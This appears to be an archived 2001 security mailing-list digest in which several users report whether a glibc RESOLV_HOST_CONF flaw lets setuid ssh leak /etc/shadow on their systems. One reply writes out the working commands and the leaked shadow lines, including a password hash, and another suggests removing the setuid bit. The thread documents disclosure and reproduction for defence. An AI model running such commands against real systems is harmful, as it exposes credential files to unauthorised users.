Re: Glibc Local Root Exploit

[Ben Greenbaum <bgreenbaum () SECURITYFOCUS COM>]

Summary of responses:

----------------------------------
From: Jag <agrajag () linuxpower org>

On Wed, 10 Jan 2001, Thomas T. Veldhouse wrote:
> This does not happen on my machine using glibc-2.2 and openssh-2.3.0p1
> following your example.
I have reproduced it with glibc-2.2 and openssh-2.3.0p1  The key is that
you must actually ssh to a valid host.  If ssh can't resolve the host,
it won't display the contents of the file.

------------------------------------------------
From: Lukasz Trabinski <lukasz () lt wsisiz edu pl>

On Wed, 10 Jan 2001, Thomas T. Veldhouse wrote:
> This does not happen on my machine using glibc-2.2 and openssh-2.3.0p1
> following your example.

Let's test it. :-)

[lukasz@lt lukasz]$ ls -all /usr/bin/ssh
-rwsr-xr-x    1 root     root       176036 Jan  6 14:34 /usr/bin/ssh
[lukasz@lt lukasz]$ export RESOLV_HOST_CONF=/etc/shadow
[lukasz@lt lukasz]$ ssh lt
/etc/shadow: line 1: bad command
`root:$1$3qweG6dk$i1ZoWh6uqweiuaniVm1:11270:0:99999:7:::134537268'
/etc/shadow: line 2: bad command `bin:x:10679:0:99999:7:::'
/etc/shadow: line 3: bad command `daemon:x:10679:0:99999:7:::'
/etc/shadow: line 4: bad command `adm:x:10679:0:99999:7:::

Nice. :)

[lukasz@lt lukasz]$ rpm -q openssh
openssh-2.3.0p1-4
[lukasz@lt lukasz]$ rpm -q glibc
glibc-2.2-9
All was taken from RH updates.

[lukasz@lt lukasz]$ cat /etc/redhat-release
Red Hat Linux release 7.0 (Guinness)

but:

[lukasz@yyy lukasz]$ ll /usr/bin/ssh
-rwxr-xr-x    1 root     root       176932 Nov 21 23:53 /usr/bin/ssh
[lukasz@xxx lukasz]$ ssh xxx
lukasz@xxx's password:

glibc 2.2-9 openssh-2.3.0, RH 7.0.

Sultion:
Only passwd needs setuid flag. :)

-------------------------------------------------------------------------
From: Alexander Schreiber <alexander.schreiber () informatik tu-chemnitz de>

Tested on Debian 2.2 (potato) with OpenSSH-1.2.3 and libc6 2.1.3: does
not work.

----------------------------------------------
From: Michael Devogelaere <michael () digibel be>

It works on my system:
glibc 2.2 and openssh-2.3.0p1 (all latest updates from redhat)
(luckily enough i don't tolerate users on my system <grin>)

-----------------------------------------
From: elliptic <elliptic () cipherpunks com>

Likewise, I can not reproduce this bug on Slackware Linux 7.0, which is
currently using glibc version 2.1.3.  Additionally, this is the revision
of glibc included with Slackware 7.1, which would likely also not be
vulnerable.

------------------------------------------------------
From: Joseph Nicholas Yarbrough <nyarbrough () lurhq com>

I am unable to reproduce this using slackware 7.1(glibc2.1.3).
What version of slackware were these "others" reporting positive results from?

------------------------------------------------
From: Lukasz Trabinski <lukasz () lt wsisiz edu pl>

> [lukasz@lt lukasz]$ rpm -q openssh
> openssh-2.3.0p1-4

I have tested 1.5-1.2.30 (with ssh root setuid, too. We can read
/etc/shadow, too). :-)

------------------------------------------------